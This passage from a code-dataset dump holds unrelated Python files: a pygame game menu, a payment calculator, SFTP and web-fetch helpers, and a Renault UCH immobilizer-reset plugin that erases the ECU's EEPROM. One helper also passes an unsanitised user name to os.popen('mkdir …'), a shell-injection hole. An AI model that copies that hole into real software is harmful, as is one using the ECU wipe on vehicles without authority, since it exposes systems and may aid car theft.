files\nfrom bfrl import constants\nfrom bfrl import draw\nfrom bfrl import maps\nfrom bfrl import game\nfrom bfrl import globals\n\n\ndef main():\n\n # UI Addresses\n center_x, center_y = (constants.CAMERA_WIDTH / 2, constants.CAMERA_HEIGHT / 2)\n game_tile_x, game_tile_y = (center_x, center_y - 260)\n footer_x, footer_y = (center_x - 500, constants.CAMERA_HEIGHT - 10)\n continue_x, continue_y = (center_x, center_y + 240)\n new_game_x, new_game_y = (center_x, continue_y + 40)\n options_x, options_y = (center_x, new_game_y + 40)\n exit_x, exit_y = (center_x, options_y + 40)\n\n game_title = {\n 'display_surface': globals.SURFACE_MAIN,\n 'text_to_display': 'PythonRL',\n 'font': constants.FONT_TITLE_SCREEN,\n 'coordinates': (game_tile_x, game_tile_y),\n 'text_color': constants.COLOR_WHITE,\n 'back_color': constants.COLOR_BLACK,\n 'alignment': 'center',\n }\n\n footer = {\n 'display_surface': globals.SURFACE_MAIN,\n 'text_to_display': 'music by icons8.com',\n 'font': constants.FONT_MESSAGE_TEXT,\n 'coordinates': (footer_x, footer_y),\n 'text_color': constants.COLOR_GREY,\n 'alignment': 'center',\n }\n\n continue_button_attributes = {\n 'surface': globals.SURFACE_MAIN,\n 'button_text': 'continue',\n 'size': (150, 35),\n 'center_coordinates': (continue_x, continue_y)\n }\n continue_button = draw.UIButton(**continue_button_attributes)\n\n new_game_button_attributes = {\n 'surface': globals.SURFACE_MAIN,\n 'button_text': 'new game',\n 'size': (150, 35),\n 'center_coordinates': (new_game_x, new_game_y)\n }\n new_game_button = draw.UIButton(**new_game_button_attributes)\n\n options_attributes = {\n 'surface': globals.SURFACE_MAIN,\n 'button_text': 'options',\n 'size': (150, 35),\n 'center_coordinates': (options_x, options_y)\n }\n options_button = draw.UIButton(**options_attributes)\n\n quit_button_attributes = {\n 'surface': globals.SURFACE_MAIN,\n 'button_text': 'quit game',\n 'size': (150, 35),\n 'center_coordinates': (exit_x, exit_y)\n }\n quit_button = draw.UIButton(**quit_button_attributes)\n\n # loads theme music\n pygame.mixer.music.load(globals.ASSETS.main_menu)\n pygame.mixer.music.play(loops=-1)\n\n menu_running = True\n while menu_running:\n\n list_of_events = pygame.event.get()\n mouse_position = pygame.mouse.get_pos()\n\n game_input = (list_of_events, mouse_position)\n\n for event in list_of_events:\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n # button updates\n if continue_button.update(game_input):\n pygame.mixer.music.stop()\n game.start(continue_game=True)\n\n if new_game_button.update(game_input):\n pygame.mixer.music.stop()\n game.start(continue_game=False)\n\n if options_button.update(game_input):\n options()\n\n if quit_button.update(game_input):\n pygame.mixer.music.stop()\n pygame.quit()\n sys.exit()\n\n # draw menu\n globals.SURFACE_MAIN.blit(globals.ASSETS.main_menu_bg, (0, 0))\n draw.text(**game_title)\n draw.text(**footer)\n\n # update surfaces\n continue_button.draw()\n new_game_button.draw()\n options_button.draw()\n quit_button.draw()\n pygame.display.update()\n\n\ndef options():\n\n window_center = (constants.CAMERA_WIDTH / 2, constants.CAMERA_HEIGHT / 2)\n\n settings_menu_width = 200\n settings_menu_height = 200\n settings_menu_bg_color = constants.COLOR_DEFAULT_BG\n\n settings_menu_surface = pygame.Surface((settings_menu_width, settings_menu_height))\n settings_menu_rect = pygame.Rect(0, 0, settings_menu_width, settings_menu_width)\n settings_menu_rect.center = window_center\n menu_center_x, menu_center_y = settings_menu_rect.center\n\n # Define Sound Settings Slider\n slider_sound_text = {\n 'display_surface': globals.SURFACE_MAIN,\n 'text_to_display': 'sound',\n 'font': constants.FONT_MESSAGE_TEXT,\n 'coordinates': (menu_center_x, menu_center_y - 60),\n 'text_color': constants.COLOR_WHITE,\n 'alignment': 'center',\n }\n slider_sound_attributes = {\n 'size': (125, 15),\n 'surface': globals.SURFACE_MAIN,\n 'center_coordinates': (menu_center_x, menu_center_y - 40),\n 'color_background': constants.COLOR_WHITE,\n 'color_foreground': constants.COLOR_GREEN,\n 'value': globals.PREFERENCES.volume_sound\n }\n slider_sound = draw.UISlider(**slider_sound_attributes)\n\n # Define Music Settings Slider\n slider_music_text = {\n 'display_surface': globals.SURFACE_MAIN,\n 'text_to_display': 'music',\n 'font': constants.FONT_MESSAGE_TEXT,\n 'coordinates': (menu_center_x, menu_center_y),\n 'text_color': constants.COLOR_WHITE,\n 'alignment': 'center',\n }\n slider_music_attributes = {\n 'size': (125, 15),\n 'surface': globals.SURFACE_MAIN,\n 'center_coordinates': (menu_center_x, menu_center_y + 20),\n 'color_background': constants.COLOR_WHITE,\n 'color_foreground': constants.COLOR_GREEN,\n 'value': globals.PREFERENCES.volume_music\n }\n slider_music = draw.UISlider(**slider_music_attributes)\n\n # Create save globals.PREFERENCES button\n save_preferences_button_attributes = {\n 'surface': globals.SURFACE_MAIN,\n 'button_text': 'save',\n 'size': (100, 35),\n 'center_coordinates': (menu_center_x, menu_center_y + 70)\n }\n save_preferences_button = draw.UIButton(**save_preferences_button_attributes)\n\n menu_close = False\n while not menu_close:\n\n list_of_events = pygame.event.get()\n mouse_position = pygame.mouse.get_pos()\n\n game_input = (list_of_events, mouse_position)\n\n # for event in list_of_events:\n # if event.type == pygame.KEYDOWN:\n # if event.key == pygame.K_ESCAPE:\n # menu_close = True\n\n slider_sound.update(game_input)\n if globals.PREFERENCES.volume_sound != slider_sound.value:\n globals.PREFERENCES.volume_sound = slider_sound.value\n globals.ASSETS.sound_adjust()\n\n slider_music.update(game_input)\n if globals.PREFERENCES.volume_music != slider_music.value:\n globals.PREFERENCES.volume_music = slider_music.value\n globals.ASSETS.sound_adjust()\n\n if save_preferences_button.update(game_input):\n game.preferences_save()\n menu_close = True\n\n settings_menu_surface.fill(settings_menu_bg_color)\n globals.SURFACE_MAIN.blit(settings_menu_surface, settings_menu_rect.topleft)\n\n draw.text(**slider_sound_text)\n slider_sound.draw()\n\n draw.text(**slider_music_text)\n slider_music.draw()\n\n save_preferences_button.draw()\n\n pygame.display.update()\n\n\ndef pause():\n \"\"\"\n This menu pauses the game and displays a simple message\n \"\"\"\n\n menu_close = False\n\n window_width = constants.CAMERA_WIDTH\n window_height = constants.CAMERA_HEIGHT\n\n menu_text = 'PAUSED'\n menu_font = constants.FONT_DEBUG_MESSAGE\n\n text_height = draw.helper_text_height(menu_font)\n text_width = draw.helper_text_width(menu_font) * len(menu_text)\n\n text_location = (int(window_width/2 - text_width/2), int(window_height/2 - text_height/2))\n\n while not menu_close:\n events_list = pygame.event.get()\n for event in events_list:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_p:\n menu_close = True\n if event.key == pygame.K_ESCAPE:\n menu_close = True\n\n font_color = constants.COLOR_WHITE\n bg_color = constants.COLOR_BLACK\n draw.text(globals.SURFACE_MAIN, menu_text, constants.FONT_DEBUG_MESSAGE, text_location, font_color, bg_color)\n globals.CLOCK.tick(constants.GAME_FPS)\n pygame.display.flip()\n\n\ndef inventory():\n\n menu_width = 200\n menu_height = 200\n\n window_width = constants.CAMERA_WIDTH\n window_height = constants.CAMERA_HEIGHT\n\n menu_x = int(window_width/2 - menu_width/2)\n menu_y = int(window_height/2 - menu_height/2)\n\n menu_location = (menu_x, menu_y)\n\n menu_font = constants.FONT_MESSAGE_TEXT\n menu_text_height = draw.helper_text_height(menu_font)\n\n inventory_surface = pygame.Surface((menu_width, menu_height))\n\n menu_close = False\n while not menu_close:\n\n menu_font = constants.FONT_MESSAGE_TEXT\n menu_font_color = constants.COLOR_WHITE\n menu_bg_color = constants.COLOR_BLACK\n menu_mouse_over_bg = constants.COLOR_GREY\n\n # Clear the menu\n inventory_surface.fill(constants.COLOR_BLACK)\n\n # Collect list of item names\n item_list = [item.display_name for item in globals.PLAYER.container.inventory]\n\n # Get list of input events\n events_list = pygame.event.get()\n\n # Get mouse coordinates relative to inventory window\n mouse_x, mouse_y = pygame.mouse.get_pos()\n mouse_x_relative = mouse_x - menu_x\n mouse_y_relative = mouse_y - menu_y\n\n # Check if mouse is in the window\n mouse_in_window = (0 < mouse_x_relative < menu_width and 0 < mouse_y_relative < menu_height)\n\n # convert mouse height to inventory line\n mouse_line_selection = int(mouse_y_relative / menu_text_height)\n\n for event in events_list:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_i:\n menu_close = True\n if event.key == pygame.K_ESCAPE:\n menu_close = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1 and mouse_in_window and mouse_line_selection <= len(item_list):\n globals.PLAYER.container.inventory[mouse_line_selection].item.use()\n globals.CLOCK.tick(constants.GAME_FPS)\n # TODO keep inventory open if item is an equipment\n menu_close = True\n\n # Draw item list\n for line, name in enumerate(item_list):\n name_location = (0, 0 + line * menu_text_height)\n if line == mouse_line_selection and mouse_in_window:\n draw.text(inventory_surface, name, menu_font, name_location, menu_font_color, menu_mouse_over_bg)\n else:\n draw.text(inventory_surface, name, menu_font, name_location, menu_font_color, menu_bg_color)\n\n # Render Game\n\n draw.game()\n\n # Display Menu\n globals.SURFACE_MAIN.blit(inventory_surface, menu_location)\n globals.CLOCK.tick(constants.GAME_FPS)\n pygame.display.flip()\n\n\ndef tile_select(origin=None, max_range=None, ignore_walls=True, ignore_creatures=True, radius=None):\n \"\"\"\n This menu lets the player select a tile on the map.\n The game pauses, produces a screen rectangle, and returns the map address when the LMB is clicked.\n :return: (x,y) map address tuple\n \"\"\"\n\n menu_close = False\n while not menu_close:\n\n # get mouse position\n mouse_coordinates = pygame.mouse.get_pos()\n map_coordinate_x, map_coordinate_y = globals.CAMERA.window_to_map(mouse_coordinates)\n\n map_address_x = int(map_coordinate_x / constants.CELL_WIDTH)\n map_address_y = int(map_coordinate_y / constants.CELL_HEIGHT)\n\n if origin:\n list_of_tiles = maps.find_line(origin, (map_address_x, map_address_y))\n else:\n list_of_tiles = [(map_address_x, map_address_y)]\n\n if max_range:\n list_of_tiles = list_of_tiles[:max_range + 1]\n\n for i, (x, y) in enumerate(list_of_tiles):\n if i == 0:\n continue\n if not ignore_walls and globals.GAME.current_map.check_for_wall(x, y):\n list_of_tiles = list_of_tiles[:i + 1]\n break\n if not ignore_creatures and globals.GAME.current_map.check_for_creature(x, y):\n list_of_tiles = list_of_tiles[:i + 1]\n break\n\n # get button clicks\n events_list = pygame.event.get()\n for event in events_list:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_l:\n menu_close = True\n if event.key == pygame.K_ESCAPE:\n menu_close = True\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n return list_of_tiles[-1]\n\n # draw game first\n globals.SURFACE_MAIN.fill(constants.COLOR_DEFAULT_BG)\n globals.SURFACE_MAP.fill(constants.COLOR_DEFAULT_BG)\n\n globals.CAMERA.update()\n\n # draw the map first\n draw.map_surface(globals.GAME.current_map.map_tiles)\n for obj in globals.GAME.objects_on_map:\n obj.draw()\n\n # draw rectangle at mouse position on top of game\n if len(list_of_tiles) > 1:\n for tile in list_of_tiles[1:]:\n if tile == list_of_tiles[-1]:\n draw.tile_rect(tile, marker='X')\n else:\n draw.tile_rect(tile)\n\n # TODO: Show radius if len = 1\n if radius:\n area_of_effect = maps.find_radius(list_of_tiles[-1], radius)\n for x, y in area_of_effect:\n draw.tile_rect((x, y), tile_color=constants.COLOR_RED)\n\n else:\n draw.tile_rect((map_address_x, map_address_y), marker='X')\n\n # update main surface with the new map\n globals.SURFACE_MAIN.blit(globals.SURFACE_MAP, (0, 0), globals.CAMERA.rectangle)\n\n draw.debug()\n draw.messages()\n\n globals.CLOCK.tick(constants.GAME_FPS)\n pygame.display.flip()\n","sub_path":"bfrl/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":14018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"122087587","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 13 16:57:09 2019\r\n\r\n@author: VIJ Global\r\n\"\"\"\r\n\r\n\r\nbalance = int(input(\"please put your balance on your credit card: \"))\r\nannualInterestRate = float(input(\"please put your annual interest rate in decimal: \"))\r\n\r\nmonthlyInterestRate = annualInterestRate/12\r\ni = 0\r\nmonth = 0\r\ndiff = 0.01\r\n\r\nmonthlyPaymentLower = balance/12\r\nmonthlyPaymentUpper = (balance*(1 + monthlyInterestRate)**12)/12.0\r\namount= 0\r\nunit_balance = balance\r\nwhile abs(amount-balance) >= diff:\r\n balance = balance - amount + ((balance - amount) * monthlyInterestRate)\r\n if balance != 0 and i < 12:\r\n amount = (monthlyPaymentLower+monthlyPaymentUpper)/2\r\n i += 1\r\n print(\"month: \", month, \"amount: \",amount, \"my balance is: \", balance)\r\n else:\r\n break \r\n month += 1\r\namount = round (amount,2)\r\nprint (\"Lowest Payment: \", amount, \"after \", month, \" months\")\r\n\r\n\r\n\r\n\"\"\"___Real code without bisection___\r\namount = 0\r\ninit_balance = balance\r\nmonthlyInterestRate = annualInterestRate/12\r\n\r\nwhile balance > 0:\r\n for i in range(12):\r\n balance = balance - amount + ((balance - amount) * monthlyInterestRate)\r\n if balance > 0:\r\n amount += 10\r\n balance = init_balance\r\n elif balance <= 0:\r\n break\r\nprint('Lowest Payment:', amount)\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\"\"\"___Real code without bisection___\r\n\r\nbalance = int(input(\"please put your balance on your credit card: \"))\r\nannualInterestRate = float(input(\"please put your annual interest rate in decimal: \"))\r\n\r\nmonthlyInterestRate = annualInterestRate/12\r\n\r\nmonthlyPaymentLower = balance/12\r\nmonthlyPaymentUpper = (balance*(1+monthlyInterestRate)**12)/12.0\r\namount = (monthlyPaymentLower+monthlyPaymentUpper)/2\r\n\r\n\r\ninit_balance = balance\r\ndiff = 0.01\r\n\r\nwhile abs(amount-balance) >= diff:\r\n for i in range(12):\r\n balance = balance - amount + ((balance - amount) * monthlyInterestRate)\r\n print (amount)\r\n if balance > 0:\r\n amount += 10\r\n balance = init_balance\r\n elif balance <= 0:\r\n break\r\namount = round (amount,2)\r\nprint('Lowest Payment:', amount)\r\n\"\"\"","sub_path":"Projects/p3_w2.py","file_name":"p3_w2.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"490725802","text":"import logging, sys, os, time\nfrom configs import config\nimport paramiko\n\nsys.path.append(os.path.dirname(os.getcwd()))\n# from automation.config import HOSTNAME\n\ndef send_to_sftpserver(request, dir=None):\n # setup a SSHClient object\n user = request.request['user']\n if not dir:\n dir = os.path.join(config.DEFAULT_DIR, user)\n\n ssh = paramiko.SSHClient()\n\n\n t = paramiko.Transport((config.SFTP_HOSTIP, config.SFTP_PORT))\n t.connect(username=config.SFTP_USERNAME, password=config.SFTP_PASSWORD)\n sftp = paramiko.SFTPClient.from_transport(t)\n #\n # # 允许将信任的主机自动加入到host_allow 列表,此方法必须放在connect方法的前面\n # ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n # # connect to host\n # try:\n # ssh.connect(hostname=config.SFTP_HOSTIP,\n # port=config.SFTP_PORT,\n # username=config.SFTP_USERNAME,\n # password=config.SFTP_PASSWORD,\n # timeout=15)\n # except Exception as e:\n # raise\n # else:\n # stdin, stdout, stderr = ssh.exec_command('ls')\n # for line in stdout:\n # print('stdout',line)\n #\n # for line in stderr:\n # print('stderr',line)\n # sftp = paramiko.SFTPClient.from_transport(ssh)\n\n for file in os.listdir(dir):\n if file.endswith('.csv'):\n try:\n new_file_name = '{}_{}'.format(user, file)\n try:\n os.rename(os.path.join(dir,file), os.path.join(dir, new_file_name))\n except Exception as e:\n logging.error('rename error')\n raise\n else:\n local_file = os.path.join(dir, new_file_name)\n remote_dir = os.path.join(config.SFTP_DIR, new_file_name)\n sftp.put(local_file, remote_dir)\n except Exception as e:\n raise\n else:\n logging.info('process for file {}'.format(os.path.join(dir, new_file_name)))\n os.remove(os.path.join(dir, new_file_name))\n\n ssh.close()\n\ndef mkdir(user):\n # make up the dirctory in selenium server to store the report for user\n # and return the dirctory name\n logging.debug('in make dir')\n dir_name = os.path.join(config.DEFAULT_DIR, user)\n if not os.path.exists(dir_name):\n output = os.popen('mkdir {}'.format(dir_name))\n logging.debug('create dir, the result is {}'.format(output.read()))\n return dir_name\n\nif __name__ == '__main__':\n # trigger_send_to_ftpserver(HOSTNAME)\n # set_environment(hostname='9.112.56.150')\n\n from downloader import MyRequest\n\n request = {}\n\n r = MyRequest(request)\n r.dirname = os.path.curdir\n send_to_sftpserver(r, r.dirname)\n","sub_path":"utils/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"293517992","text":"#!/usr/bin/env python\n\ntry:\n from setuptools import setup\n test_extras = {\n 'test_suite': 'pythonosc.test',\n }\nexcept ImportError:\n from distutils.core import setup\n test_extras = {}\n\n\nsetup(\n name='python-osc',\n version='1.6',\n author='attwad',\n author_email='tmusoft@gmail.com',\n description=(\n 'Open Sound Control server and client implementations in pure Python'),\n long_description=open('README.rst').read(),\n url='https://github.com/attwad/python-osc',\n platforms='any',\n packages=[\n 'pythonosc',\n 'pythonosc.parsing',\n 'pythonosc.test',\n 'pythonosc.test.parsing',\n ],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3',\n 'Topic :: Multimedia :: Sound/Audio',\n 'Topic :: System :: Networking',\n ],\n **test_extras\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"223997739","text":"'''\r\nread precatórios from text file\r\n'''\r\nimport csv\r\nimport sys\r\nimport re\r\n\r\nclass Precatorio():\r\n def __init__(self, num):\r\n self.code = num\r\n self.value = -1\r\n self.description = ''\r\n \r\n def set_description(self, desc:str):\r\n self.description = desc\r\n \r\n def set_value(self, val:int):\r\n self.value = val\r\n\r\n def has_description(self):\r\n return self.description != '' and self.description is not None\r\n\r\n def __str__(self):\r\n return '[{}] {} (R$ {})'.format(\r\n self.code,\r\n self.description,\r\n self.value\r\n )\r\n\r\ndef is_precatorio(text:str):\r\n m = re.search('\\d{20}', text)\r\n return m is not None\r\n\r\ndef is_money_value(text:str):\r\n m = re.search('[^\\d\\.]', text)\r\n return m is None\r\n\r\ntext_file = open(sys.argv[1], 'r', encoding='utf-8')\r\nprevious_line = ''\r\nprecatorios = []\r\nvalores = []\r\nreading_values = False\r\n\r\nsilent = '-s' in sys.argv\r\n\r\nfor line in text_file:\r\n line = line.replace('\\n', '')\r\n if line == '':\r\n continue\r\n if is_precatorio(line):\r\n # significa que temos o código do precatório, então\r\n # a linha anterior é a descrição dele\r\n p = Precatorio(line)\r\n precatorios.append(p)\r\n else:\r\n if precatorios and not reading_values and not precatorios[len(precatorios) - 1].has_description():\r\n precatorios[len(precatorios) - 1].set_description(line)\r\n \r\n if 'VALOR (R$)' in line:\r\n reading_values = True\r\n\r\n if is_money_value(line) and reading_values:\r\n valores.append(int(line.replace('.', '')))\r\n\r\nif len(precatorios) == len(valores):\r\n with open(sys.argv[2], mode='w', newline='') as csvfile:\r\n writer = csv.writer(csvfile, delimiter=',', quotechar='\"')\r\n for p, v in zip(precatorios, valores):\r\n p.set_value(v)\r\n if not silent:\r\n print(p)\r\n writer.writerow([p.code, p.description, p.value])\r\nelse:\r\n print('Lista de valores e lista de precatórios não batem.')\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"220039046","text":"# -*- coding: utf-8 -*-\n\n# (c) 2017\n# This is an example plugin\n\nimport PyQt5.QtCore as core\nimport PyQt5.QtWidgets as gui\n\nimport ecu\nimport options\n\n_ = options.translator('ddt4all')\n\nplugin_name = _(\"Megane/Scenic II UCH Reset\")\ncategory = _(\"UCH Tools\")\nneed_hw = True\n\n\nclass Virginizer(gui.QDialog):\n def __init__(self):\n super(Virginizer, self).__init__()\n self.megane_uch = ecu.Ecu_file(\"UCH_84_J84_03_60\", True)\n layout = gui.QVBoxLayout()\n infos = gui.QLabel(\n _(\"MEGANE II UCH VIRGINIZER
THIS PLUGIN WILL ERASE YOUR UCH
GO AWAY IF YOU HAVE NO IDEA OF WHAT IT MEANS
\"))\n infos.setAlignment(core.Qt.AlignHCenter)\n check_button = gui.QPushButton(_(\"Check UCH Virgin\"))\n self.status_check = gui.QLabel(_(\"Waiting\"))\n self.status_check.setAlignment(core.Qt.AlignHCenter)\n self.virginize_button = gui.QPushButton(_(\"Virginize UCH\"))\n layout.addWidget(infos)\n layout.addWidget(check_button)\n layout.addWidget(self.status_check)\n layout.addWidget(self.virginize_button)\n self.setLayout(layout)\n self.virginize_button.setEnabled(False)\n self.virginize_button.clicked.connect(self.reset_ecu)\n check_button.clicked.connect(self.check_virgin_status)\n self.ecu_connect()\n\n def ecu_connect(self):\n connection = self.megane_uch.connect_to_hardware()\n if not connection:\n options.main_window.logview.append(_(\"Cannot connect to ECU\"))\n self.finished()\n\n def check_virgin_status(self):\n self.start_diag_session_aftersales()\n\n virigin_check_request = self.megane_uch.requests[u'Status général des opérations badges Bits']\n request_values = virigin_check_request.send_request()\n\n if request_values is not None:\n virgin = request_values[u\"VSC UCH vierge (NbBadgeAppris=0)\"]\n if virgin == u'Vierge':\n self.virginize_button.setEnabled(False)\n self.status_check.setText(_(\"UCH virgin\"))\n return\n\n if virgin == u'Codée':\n self.virginize_button.setEnabled(True)\n self.status_check.setText(_(\"UCH coded\"))\n return\n\n self.status_check.setText(_(\"UNEXPECTED RESPONSE\"))\n\n def start_diag_session_study(self):\n sds_request = self.megane_uch.requests[u\"StartDiagSession Etude\"]\n sds_stream = \" \".join(sds_request.build_data_stream({}))\n if options.simulation_mode:\n print(\"SdSA stream\", sds_stream)\n return\n options.elm.start_session_can(sds_stream)\n\n def start_diag_session_aftersales(self):\n sds_request = self.megane_uch.requests[u\"Start Diagnostic Session\"]\n sds_stream = \" \".join(sds_request.build_data_stream({}))\n if options.simulation_mode:\n print(\"SdSS stream\", sds_stream)\n return\n options.elm.start_session_can(sds_stream)\n\n def reset_ecu(self):\n self.start_diag_session_study()\n\n reset_request = self.megane_uch.requests[u\"RAZ EEPROM\"]\n request_response = reset_request.send_request()\n\n if request_response is not None:\n self.status_check.setText(_(\"CLEAR EXECUTED\"))\n else:\n self.status_check.setText(_(\"CLEAR FAILED\"))\n\n\ndef plugin_entry():\n v = Virginizer()\n v.exec_()\n","sub_path":"megane2_uch_reset.py","file_name":"megane2_uch_reset.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"513703723","text":"#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n# Web Page抓取器\n\nimport sys\nimport urllib\nimport urllib2\nimport cookielib\nfrom gzip import GzipFile\nfrom StringIO import StringIO\nfrom encoding_processor import *\n\nclass WebFetcher:\n ''' web page fetcher class '''\n\n def set_proxy_support(self, type, host):\n proxy = urllib2.ProxyHandler({type:host})\n opener = urllib2.build_opener(proxy, urllib2.HTTPHandler)\n urllib2.install_opener(opener)\n\n def set_cookie_support(self):\n cookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar())\n opener = urllib2.build_opener(cookie, urllib2.HTTPHandler)\n urllib2.install_opener(opener)\n\n def set_encoding_support(self):\n encoding = ContentEncodingProcessor()\n opener = urllib2.build_opener(encoding, urllib2.HTTPHandler)\n urllib2.install_opener(opener)\n\n def set_proxy_and_cookie_and_encoding_support(self, type, host):\n proxy = urllib2.ProxyHandler({type:host})\n cookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar())\n encoding = ContentEncodingProcessor()\n opener = urllib2.build_opener(proxy, cookie, encoding, urllib2.HTTPHandler)\n urllib2.install_opener(opener)\n\n def get_url_host(self, url):\n url_list = url.split(\"/\")\n url_host = url_list[2]\n return url_host\n\n def make_http_header(self, url):\n host = self.get_url_host(url)\n http_header = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0',\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\",\n \"DNT\": \"1\",\n 'Host': host}\n return http_header\n\n def make_http_request(self, url_base, post_field_dict):\n http_header = self.make_http_header(url_base)\n\n if post_field_dict is None:\n post_data = None\n else:\n post_data = urllib.urlencode(post_field_dict)\n\n http_request = urllib2.Request(url = url_base + \"?\" + post_data, data = None, headers = http_header)\n return http_request\n\n def do(self, url_base, post_field_dict = None):\n http_request = self.make_http_request(url_base, post_field_dict)\n res_content = urllib2.urlopen(http_request).read()\n return res_content\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n sys.exit(1)\n\n url = sys.argv[1]\n post_field_dict = eval(sys.argv[2])\n out_file = sys.argv[3]\n\n fetcher = WebFetcher()\n fetcher.set_encoding_support()\n page_content = fetcher.do(url, post_field_dict)\n\n fd = open(out_file, \"w\")\n fd.write(page_content + \"\\n\")\n fd.flush()\n fd.close()\n\n","sub_path":"solution/tradesman/python/web_fetcher.py","file_name":"web_fetcher.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"159020021","text":"from glob import glob\n\nfrom .filecontext import FileContext\nfrom .utils import typename, printable_string_sequence\nfrom .sfdata import SFData\nfrom .sfdatafile import SFDataFile\n\n\nclass SFDataFiles(FileContext, SFData):\n\n def __init__(self, *patterns):\n self.fnames = fnames = explode_filenames(patterns)\n if not fnames:\n patterns = printable_string_sequence(patterns)\n raise ValueError(f\"No matching file for patterns: {patterns}\")\n self.files = [SFDataFile(fn) for fn in fnames]\n super().__init__()\n for f in self.files:\n self.update(f)\n\n def close(self):\n for f in self.files:\n f.close()\n\n def __repr__(self):\n tn = typename(self)\n fns = self.fnames\n fns = \"\\\", \\\"\".join(fns)\n entries = len(self)\n return f\"{tn}(\\\"{fns}\\\"): {entries} channels\"\n\n\n\ndef explode_filenames(patterns):\n fnames = []\n for p in patterns:\n fns = glob(p)\n fnames.extend(fns)\n fnames = sorted(set(fnames))\n return fnames\n\n\n\n","sub_path":"sfdata/sfdatafiles.py","file_name":"sfdatafiles.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"565785226","text":"import math\nimport numpy as np\nfrom scipy import interpolate\nfrom sklearn.model_selection import KFold\n\n\ndef calculate_distance(embeddings1, embeddings2, distance_metric=0):\n '''\n Calculate distance of embeddings1 and embeddings2\n\n Args:\n embeddings1: the first embeddings\n embeddings2: the second embeddings\n distance_metric: the metric use for distance calculate[0:Euclidian 1:Cosine]\n '''\n if distance_metric == 0:\n # Euclidian distance\n diff = np.subtract(embeddings1, embeddings2)\n dist = np.sum(np.square(diff), 1)\n elif distance_metric == 1:\n # Distance based on cosine similarity\n dot = np.sum(np.multiply(embeddings1, embeddings2), 1)\n norm = np.linalg.norm(embeddings1, axis=1)*np.linalg.norm(embeddings2, axis=1)\n similarity = dot / norm\n dist = np.arccos(similarity) / math.pi\n else: \n raise 'Undefined distance metric %d' % distance_metric\n return dist.reshape(-1, 1)\n\n\ndef calculate_accuracy(threshold, dist, actual_issame):\n '''\n Calculate accuracy of the fixed threshold\n\n Args:\n threshold: distance less than threshold will be regard as identical\n dist: the distance of embedding1 and embbeding2\n actual_issame: the true flag indicate which pair is same\n '''\n predict_issame = np.less(dist, threshold)\n tp = np.sum(np.logical_and(predict_issame, actual_issame))\n fp = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issame)))\n tn = np.sum(np.logical_and(np.logical_not(predict_issame), \n np.logical_not(actual_issame)))\n fn = np.sum(np.logical_and(np.logical_not(predict_issame), actual_issame))\n\n tpr = 0 if (tp+fn==0) else tp / (tp+fn)\n fpr = 0 if (fp+tn==0) else fp / (fp+tn)\n acc = (tp+tn) / dist.size\n return tpr, fpr, acc\n\n\ndef calculate_roc(thresholds, embeddings1, embeddings2, actual_issame, \n nrof_folds=10, distance_metric=0, subtract_mean=False):\n '''\n Calculate roc\n\n Args:\n thresholds: all the thresholds use for calculate roc\n embeddings1: the first embeddings\n embeddings2: the second embeddings\n actual_issame: the true flag indicate which pair is same\n nrof_folds: number of folds\n distance_metric: the metric use for distance calculate[0:Euclidian 1:Cosine]\n subtract_mean: Subtract feature mean before calculating distance\n '''\n assert(embeddings1.shape[0] == embeddings2.shape[0])\n assert(embeddings1.shape[1] == embeddings2.shape[1])\n\n nrof_pairs = min(len(actual_issame), embeddings1.shape[0])\n nrof_thresholds = len(thresholds)\n k_fold = KFold(n_splits=nrof_folds, shuffle=False)\n\n tprs = np.zeros((nrof_folds, nrof_thresholds))\n fprs = np.zeros((nrof_folds, nrof_thresholds))\n accuracy = np.zeros((nrof_folds))\n\n indices = np.arange(nrof_pairs)\n\n for fold_idx, (train_set, test_set) in enumerate(k_fold.split(indices)):\n if subtract_mean:\n # providing the dimension(features) of embeddings1/2 is 512\n # calculate mean of each features\n mean = np.mean(np.concatenate([embeddings1[train_set], \n embeddings2[train_set]]), axis=0)\n else:\n mean = 0\n dist = calculate_distance(embeddings1-mean, embeddings2-mean, distance_metric)\n\n # Find the best threshold for the fold\n acc_train = np.zeros((nrof_thresholds))\n for threshold_idx, threshold in enumerate(thresholds):\n _, _, 